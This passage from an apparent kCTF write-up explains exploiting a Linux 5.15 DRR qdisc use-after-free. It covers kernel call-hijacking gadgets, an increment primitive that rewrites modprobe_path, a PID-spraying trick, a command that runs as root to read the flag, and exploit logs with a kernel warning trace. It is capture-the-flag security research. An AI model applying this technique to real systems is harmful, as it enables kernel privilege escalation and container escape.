<p>Once we call our simple <code class="language-plaintext highlighter-rouge">ret</code> gadget during our experiment we return to <code class="language-plaintext highlighter-rouge">[1]</code> where the return value is interpreted as a pointer to a <code class="language-plaintext highlighter-rouge">sk_buff</code>. This could be a problem for us because whatever gadget we use could do something with the return value that is supposed to be stored in <code class="language-plaintext highlighter-rouge">rax</code>. In our experiment, our function doesn’t touch <code class="language-plaintext highlighter-rouge">rax</code>, we just return, so <code class="language-plaintext highlighter-rouge">rax</code> still points to a function address. So it definitely isn’t NULL. Since it’s not NULL we progress to <code class="language-plaintext highlighter-rouge">[2]</code>, this ends up being something like a read of <code class="language-plaintext highlighter-rouge">skb</code> field value, like a <code class="language-plaintext highlighter-rouge">skb-&gt;len</code>, so this will return a value from reading executable text in our case, because <code class="language-plaintext highlighter-rouge">rax</code> is a function address. At <code class="language-plaintext highlighter-rouge">[3]</code> we see that if that value it reads from the kernel text is less than or equal to our fake class deficit value, we enter this if statement body at <code class="language-plaintext highlighter-rouge">[4]</code>. Here, we are actually decrementing a value in our fake class, so this will write to our <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code> refill object. That is notable because that is an immutable refill object, once we refill (allocate it) we have no way of resetting/changing its contents. We then see a call to <code class="language-plaintext highlighter-rouge">qdisc_deqeueue_peeked</code> in <code class="language-plaintext highlighter-rouge">[5]</code>, which we will get into in a second, and if that returns NULL, we can escape this hell-hole of a function at <code class="language-plaintext highlighter-rouge">[6]</code>. Separately, if we make it to <code class="language-plaintext highlighter-rouge">[7]</code>, which would incur several memory accesses to our fake qdisc, we return a non-NULL pointer value. My goal from the start was that if we were to restore execution gracefully and as simply as possible, we would be required to return NULL from this function so that the calling function had nothing to do with the results of our hijacked execution. We can see even more list manipulation at <code class="language-plaintext highlighter-rouge">[8]</code> so I wanted to avoid this at all costs.</p>

<p>Let’s then go check on the call to <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code> which takes a pointer to our fake qdisc as its argument in <code class="language-plaintext highlighter-rouge">[5]</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* use instead of qdisc-&gt;dequeue() for all qdiscs queried with -&gt;peek() */</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">qdisc_dequeue_peeked</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="n">skb_peek</span><span class="p">(</span><span class="o">&amp;</span><span class="n">sch</span><span class="o">-&gt;</span><span class="n">gso_skb</span><span class="p">);</span>			<span class="c1">// [1]</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>							<span class="c1">// [2]</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">__skb_dequeue</span><span class="p">(</span><span class="o">&amp;</span><span class="n">sch</span><span class="o">-&gt;</span><span class="n">gso_skb</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">qdisc_is_percpu_stats</span><span class="p">(</span><span class="n">sch</span><span class="p">))</span> <span class="p">{</span>
			<span class="n">qdisc_qstats_cpu_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_qstats_cpu_qlen_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="n">qdisc_qstats_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">--</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">sch</span><span class="o">-&gt;</span><span class="n">dequeue</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>				<span class="c1">// [3]</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We see that we get a pointer to another <code class="language-plaintext highlighter-rouge">sk_buff</code> by calling <code class="language-plaintext highlighter-rouge">skb_peek()</code> on the <code class="language-plaintext highlighter-rouge">gso_skb</code> field of our fake qdisc. This is good news for us, because that means that this outcome is <em>probably somewhat</em> controllable for us since we control the entirety of the fake qdisc. We’ll examine <code class="language-plaintext highlighter-rouge">skb_peek()</code> in a second. If we return a non-NULL socket buffer from <code class="language-plaintext highlighter-rouge">skb_peek</code>, we then go on to call <code class="language-plaintext highlighter-rouge">__skb_dequeue</code> with the pointer to <code class="language-plaintext highlighter-rouge">gso_skb</code> and it goes on to do more list manipulation and memory accesses on the fake qdisc. This looked very unattractive to me compared to yet another indirect function call in <code class="language-plaintext highlighter-rouge">sch-&gt;deuque(sch)</code> which we should be able to again hijack because we control the fake qdisc. So at this point I’m thinking:</p>
<ol>
  <li>We hijack execution in two places: once in <code class="language-plaintext highlighter-rouge">drr_dequeue</code> and once in <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code></li>
  <li>We can use the first hijacking to do <em>something useful</em></li>
  <li>We can use the second hijacking to restore execution in some way gracefully</li>
</ol>

<p>So the first thing I tried was killing my task in the first hijacking spot just to make sure it was possible to do. I tried a few tricks that other players have used and ended up trying use <a href="https://elixir.bootlin.com/linux/v5.15.173/source/kernel/exit.c#L776"><code class="language-plaintext highlighter-rouge">do_exit</code></a> as the way to kill my task which is whatever task I use to send a packet to the loopback interface which triggers the call to <code class="language-plaintext highlighter-rouge">drr_dequeue</code>. The problem is that I hit this code block:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">in_interrupt</span><span class="p">()))</span>
		<span class="n">panic</span><span class="p">(</span><span class="s">"Aiee, killing interrupt handler!"</span><span class="p">);</span>
</code></pre></div></div>

<p>This means that we hijack execution in an interrupt context, likely from the interrupt caused by the loopback interface receiving a packet. So these types of tricks that typically apply to a normal process context don’t apply here, and I don’t have powerful enough primitives (we’re just limimted to two function calls, not a full ROP chain) to remove my task from an interrupt context. So my plan was to just exit the dequeue function normally by returning NULL if possible.</p>

<p>To see if this is feasible, we need to see where and how we can reach the <code class="language-plaintext highlighter-rouge">sch-&gt;dequeue</code> inside of <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code> which is our 2nd hijack spot. We need <code class="language-plaintext highlighter-rouge">skb_peek(&amp;sch-&gt;gso_skb)</code> to return NULL:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">skb_peek</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">sk_buff_head</span> <span class="o">*</span><span class="n">list_</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="n">list_</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="p">)</span><span class="n">list_</span><span class="p">)</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Turns out this is just a simple check to see if a list head element points to itself, indicating that the list is empty. We can actually do this because we control the fake qdisc. So as long as at the offset for <code class="language-plaintext highlighter-rouge">&amp;sch-&gt;gso_skb</code> the value there points its own address, we can return a NULL from this function. That lands us right into <code class="language-plaintext highlighter-rouge">sch-&gt;dequeue</code>, our 2nd hijack spot. Our goal is to have <code class="language-plaintext highlighter-rouge">qdisc_dequeue_peeked</code> return NULL, so we need this arbitrary function call to return NULL or 0. So now we need two gadgets or function calls:</p>
<ol>
  <li>A function call that does something <em>useful</em> with our control over <code class="language-plaintext highlighter-rouge">rdi</code></li>
  <li>A function call that simply returns NULL or 0 to restore execution gracefully within <code class="language-plaintext highlighter-rouge">drr_dequeue</code></li>
</ol>

<h2 id="gadget-hunting">Gadget Hunting</h2>
<p>I assumed finding the 2nd gadget would be easy, a function call that simply returns 0 or NULL; however, it still took me some time to find. The first thought I had was let’s just find a function like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">function</span><span class="p">(</span><span class="k">struct</span> <span class="n">foo</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">return</span> <span class="n">obj</span><span class="o">-&gt;</span><span class="n">field</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This would be easy, we control the entirety of the memory pointed to by <code class="language-plaintext highlighter-rouge">struct foo *</code> and we can just simply read a field that returns 0. But then I remembered that I can’t really have NULL values in my <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code> because its interpreted as a path name when it’s sent. So I skipped this idea. What would be even better is a function like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">function</span><span class="p">(</span><span class="k">struct</span> <span class="n">foo</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">return</span> <span class="n">obj</span><span class="o">-&gt;</span><span class="n">field</span><span class="o">-&gt;</span><span class="n">val</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This would be perfect, we could just have field point to something that is guaranteed to be 0, such as the end of our <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code> where a NULL value is no issue. I found just that in this function:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span>
<span class="nf">sch_frag_dst_get_mtu</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">dst_entry</span> <span class="o">*</span><span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">return</span> <span class="n">dst</span><span class="o">-&gt;</span><span class="n">dev</span><span class="o">-&gt;</span><span class="n">mtu</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So now we have our “return NULL gadget” and it was time to find our “do something useful gadget”. I played around with the idea for a long time of using this first hijack spot to perform an arbitrary free to upgrade our limited class UAF to something more useful, a more generalized UAF. I would need something like this probably:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">function</span><span class="p">(</span><span class="k">struct</span> <span class="n">foo</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">kfree</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">ptr</span><span class="p">);</span>
	<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I quickly abandoned this idea though because I didn’t have a leaked heap pointer to point the <code class="language-plaintext highlighter-rouge">kfree</code> at, I didn’t want to resort to using leaked pointers from our <code class="language-plaintext highlighter-rouge">WARN()</code> splat because it felt like cheating. So then I became determined to find an arbitrary write gadget. With the arbitrary write gadget, I would be able to overwrite <code class="language-plaintext highlighter-rouge">modprobe_path</code> to point to a file I control and read the flag from the container host. This has been done in numerous wasy in the kCTF program so I knew it was feasible. Now began the hard work of finding a write gadget.</p>

<h2 id="finding-an-arbitrary-write-function">Finding an Arbitrary Write Function</h2>
<p>Finding the write function took me a very long time. I was looking for a function that took a single pointer argument and derived a write from its contents, I was looking for something like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">function</span><span class="p">(</span><span class="k">struct</span> <span class="n">foo</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">u64</span> <span class="o">*</span><span class="n">location</span> <span class="o">=</span> <span class="n">obj</span><span class="o">-&gt;</span><span class="n">field</span><span class="p">;</span>
	<span class="o">*</span><span class="n">location</span> <span class="o">=</span> <span class="n">obj</span><span class="o">-&gt;</span><span class="n">value</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This would derive both the “what” and the “where” in the write from <code class="language-plaintext highlighter-rouge">rdi</code> which we control as our fake qdisc. To start searching I just started thinking about what data structures in the kernel are humongous and often self-contained logic-wise, ie, likely to passed to a function by themselves. I narrowed my search down to the following structure types: socket buffers, files, directory entries, inodes, and a few others. Cycling through these subsystems and grepping for patterns, I eventually found this function:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">clear_nlink</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_nlink</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">inode</span><span class="o">-&gt;</span><span class="n">__i_nlink</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">atomic_long_inc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_sb</span><span class="o">-&gt;</span><span class="n">s_remove_count</span><span class="p">);</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This fits our needs perfectly, if a field in the passed in <code class="language-plaintext highlighter-rouge">inode</code> is not NULL, which we prefer, then increment the value at <code class="language-plaintext highlighter-rouge">inode-&gt;i_sb-&gt;s_remove_count</code> as if its a u64 value. An increment is a type of limited write primitive, we’re able to target a single byte at a time with this primitive and increment it until it reaches a desired value and then we can move onto the next byte. So my goal became:</p>
<ol>
  <li>Use the increment primitive to increment the first character of <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> in kernel memory</li>
  <li>Use the return NULL hijack to exit gracefully from <code class="language-plaintext highlighter-rouge">drr_dequeue</code></li>
  <li>Send another packet to repeat until <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> is overwritten to something we control</li>
</ol>

<p>One iteration of this worked perfect, and I was able to check after the iteration and see that <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> had become <code class="language-plaintext highlighter-rouge">0sbin/modprobe</code> in memory. So the concept worked, but now we have other problems, we need to execute this code path dozens of times because we need to do a lot of incrementing. We want <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> to become something like <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code> where pid 500 is a pid of ours and fd 3 is a privilege escalation script that gets executed when the kernel tries to invoke the <code class="language-plaintext highlighter-rouge">modprobe_path</code>.</p>

<p>So let’s revisit <code class="language-plaintext highlighter-rouge">drr_dequeue</code> and identify the spots that cause problems:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">drr_dequeue</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">))</span>
		<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
	<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">cl</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">,</span> <span class="k">struct</span> <span class="n">drr_class</span><span class="p">,</span> <span class="n">alist</span><span class="p">);</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">peek</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>				
		<span class="k">if</span> <span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">qdisc_warn_nonwc</span><span class="p">(</span><span class="n">__func__</span><span class="p">,</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>
			<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">len</span> <span class="o">=</span> <span class="n">qdisc_pkt_len</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>					<span class="c1">// [1]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&lt;=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span><span class="p">)</span> <span class="p">{</span>					<span class="c1">// [2]</span>
			<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">-=</span> <span class="n">len</span><span class="p">;</span>					<span class="c1">// [3]</span>
			<span class="n">skb</span> <span class="o">=</span> <span class="n">qdisc_dequeue_peeked</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>			
			<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">))</span>
				<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>					
			<span class="k">if</span> <span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
				<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">);</span>

			<span class="n">bstats_update</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">bstats</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_bstats_update</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_qstats_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">--</span><span class="p">;</span>
			<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>						
		<span class="p">}</span>

		<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">+=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">quantum</span><span class="p">;</span>
		<span class="n">list_move_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">);</span>				
	<span class="p">}</span>
<span class="nl">out:</span>
	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To execute this code path over and over, we need to make sure we <em>always</em> enter the if statement body. So we always need <code class="language-plaintext highlighter-rouge">len &lt;= cl-&gt;deficit</code> to be true. Remember that <code class="language-plaintext highlighter-rouge">len</code> is derived from reading a value at some offset in the kernel text next to our arbitrary write gadget address, so we have 0 control over this value that is returned. But we do control <code class="language-plaintext highlighter-rouge">cl-&gt;deficit</code> with our <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code>, so we can make sure that is always <code class="language-plaintext highlighter-rouge">0xffffffff</code>. Awesome, we’re good to go. Nope, at <code class="language-plaintext highlighter-rouge">[3]</code> that value is decremented in place by <code class="language-plaintext highlighter-rouge">len</code>, so that memory is access and written to. This is a big problem for me, <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code> is immutable, I have no way of updating that value to reset it.</p>

<p>At this point, I realized I’d have to completely redo my strategy for refilling the UAF class. I should’ve done this from the beginning but I was so stupidly attached to this idea of using <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code> because I had discovered it independently a couple years ago and had some weird sense of pride in being able to finally use it. I decided to get the entire victim class object page sent back to the page allocator and reclaim the page with a pipe buffer page backing as I had done previously in my <a href="https://h0mbre.github.io/kCTF_Data_Only_Exploit/">last kCTF exploit</a>. This would give me mutable memory that I could reset every iteration.</p>

<p>But there was also another detail in the path in our write gadget:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">clear_nlink</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_nlink</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">inode</span><span class="o">-&gt;</span><span class="n">__i_nlink</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">atomic_long_inc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_sb</span><span class="o">-&gt;</span><span class="n">s_remove_count</span><span class="p">);</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This gadget NULLs out the value at <code class="language-plaintext highlighter-rouge">inode-&gt;__i_nlink</code> and we require that value to be non-NULL in order to do the increment. So this would have to be reset as well. Ontop of that, we also need to slide the write-target as we succesfully increment each character of <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> until its <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code>. So we’ll need to reset the <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code> memory each iteration as well, which is not as big of a deal since that is easily doable with <code class="language-plaintext highlighter-rouge">iptables</code>.</p>

<p>So now the exploit plan was clear:</p>
<ol>
  <li>Increment a single byte of the <code class="language-plaintext highlighter-rouge">modprobe_path</code> string</li>
  <li>Reset the page backing of all of the pipes we have allocated pages for, one of them has reclaimed our freed page containing the victim UAF class, so that we can update <code class="language-plaintext highlighter-rouge">cl-&gt;deficit</code> to <code class="language-plaintext highlighter-rouge">0xffffffff</code></li>
  <li>Reset the <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code> contents to give <code class="language-plaintext highlighter-rouge">inode-&gt;i_nlink</code> a non-NULL value</li>
  <li>Possibly reset the target pointed to by <code class="language-plaintext highlighter-rouge">s_remove_count</code> if we have incremented the current character enough in the <code class="language-plaintext highlighter-rouge">modprobe_path</code> string</li>
  <li>Repeat until finished</li>
</ol>

<h2 id="putting-it-all-together">Putting It All-Together</h2>
<p>Instead of messing with any arithmetic for determining how to increment each <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> byte until it becomes <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code>, I just simulated each write in my exploit program. So I created a local copy of <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> and a local copy of <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code> and I simulated the increment logic one iteration at a time, making sure to actually execute the increment in kernel space as well. This way, I could basically just do the increment blind and know when it was done without doing any arithmetic really. Probably better ways to do this, but this was my first idea and it worked really well for me. This actually worked first try and I successfully got <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> changed to <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code>.</p>

<p>In the namespace jail, you don’t know your pid ahead of time so I had to use a trick suggested in the kCTF discord by <a href="https://x.com/pqlqpql">@pqlpql</a> a while ago which is to just spray a certain amount of child processes and guess a pid which is likely one of those children. This is very simple and clever and works very well because when you get a shell on the kCTF COS instance, we are using a fresh-boot so pids are very predictable. I found that spraying 500 child pids would reliably mean that pid 500 would be one of your children processes.</p>

<p>Using this, at the beginning of our exploit we just need the sprayed children to open a privesc script that will be run with kernel privileges so that their <code class="language-plaintext highlighter-rouge">/proc/self/fd/3</code> would be the privesc script. And to read the flag I basically just made the script do: <code class="language-plaintext highlighter-rouge">cat /flag &gt; /proc/500/fd/0</code> and had all of the children do blocking reads on their <code class="language-plaintext highlighter-rouge">STDIN</code> file descriptors. Whoever is pid 500 would print the flag contents to the terminal and it worked first try:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[&gt;] Dropping scripts...
[&gt;] Spraying child pids...
[&gt;] Kernel base address: 0xffffffffa6000000
[&gt;] Kernfs buffer address: 0xffffffffa9267b80
[&gt;] Arbitrary write gadget address: 0xffffffffa6356310
[&gt;] Modprobe path address: 0xffffffffa8662e80
[&gt;] Return NULL gadget address: 0xffffffffa6d4ab80
[&gt;] Doing the unshare...
[&gt;] Bringing up lo interface...
[&gt;] Pinning our process to core-0...
[&gt;] Starting UDP listener...
[&gt;] Creating pipes...
[&gt;] Setting up initial classes...
[&gt;] Creating root qdisc...
[&gt;] Creating class 1:1...
[&gt;] Creating class 1:3...
[&gt;] Assigning plug qdisc to class 1:1...
[&gt;] Assigning pfifo qdisc to class 1:3...
[&gt;] Executing cross-cache stage-1...
[&gt;] Executing cross-cache stage-2...
[&gt;] Allocating victim class 1:2...
[&gt;] Executing bug to reparent qdisc to 1:2 from 1:3...
[&gt;] Displaying hierarchy setup...
class drr 1:1 root leaf 2: quantum 64Kb 
class drr 1:2 root leaf 3: quantum 64Kb 
class drr 1:3 root leaf 3: quantum 64Kb 
qdisc drr 1: dev lo root refcnt 2 
qdisc plug 2: dev lo parent 1:1 
qdisc pfifo 3: dev lo parent 1:3 refcnt 2 limit 1000p
[&gt;] Enqueueing packets in 1:1 and 1:2...
[   10.508490] drr_dequeue: plug qdisc 2: is non-work-conserving?
[&gt;] Deleting classes 1:1 and 1:2 and then cross-cache stage-3...
[   10.519000] ------------[ cut here ]------------
[   10.521778] list_del corruption, ffff8fdd50a008d0-&gt;next is NULL
[   10.525296] WARNING: CPU: 0 PID: 784 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[   10.530218] Modules linked in:
[   10.532091] CPU: 0 PID: 784 Comm: tc.bin Not tainted 5.15.173+ #1
[   10.535676] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[   10.540545] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[   10.543555] Code: 48 8b 00 48 39 f8 75 67 48 8b 52 08 48 39 c2 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 80 71 cf a7 e8 e3a
[   10.554231] RSP: 0018:ffffa1020168b940 EFLAGS: 00010282
[   10.557286] RAX: 0000000000000000 RBX: ffff8fdd50a00880 RCX: 0000000000000000
[   10.561417] RDX: 0000000000000000 RSI: ffffa1020168b770 RDI: 00000000ffffffea
[   10.565575] RBP: 0000000000010003 R08: 00000000ffffdfff R09: 0000000000000001
[   10.570036] R10: 00000000ffffdfff R11: ffffffffa8669da0 R12: 0000000000000001
[   10.574238] R13: ffff8fdd44f8e000 R14: ffffffffa7ad11e0 R15: 0000000000010000
[   10.578407] FS:  000000001a406880(0000) GS:ffff8fdd5c400000(0000) knlGS:0000000000000000
[   10.583118] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   10.586532] CR2: 00000000005a6cc0 CR3: 0000000110d5a003 CR4: 0000000000370ef0
[   10.590718] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   10.594898] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   10.599087] Call Trace:
[   10.600704]  &lt;TASK&gt;
[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
[   10.628214]  ? exc_page_fault+0x76/0x140
[   10.630556]  rtnetlink_rcv_msg+0x21e/0x350
[   10.633230]  ? security_sock_rcv_skb+0x31/0x50
[   10.635869]  ? rtnl_calcit.isra.0+0x130/0x130
[   10.638517]  netlink_rcv_skb+0x4e/0x100
[   10.640868]  netlink_unicast+0x231/0x370
[   10.643209]  netlink_sendmsg+0x250/0x4b0
[   10.645546]  __sock_sendmsg+0x5c/0x70
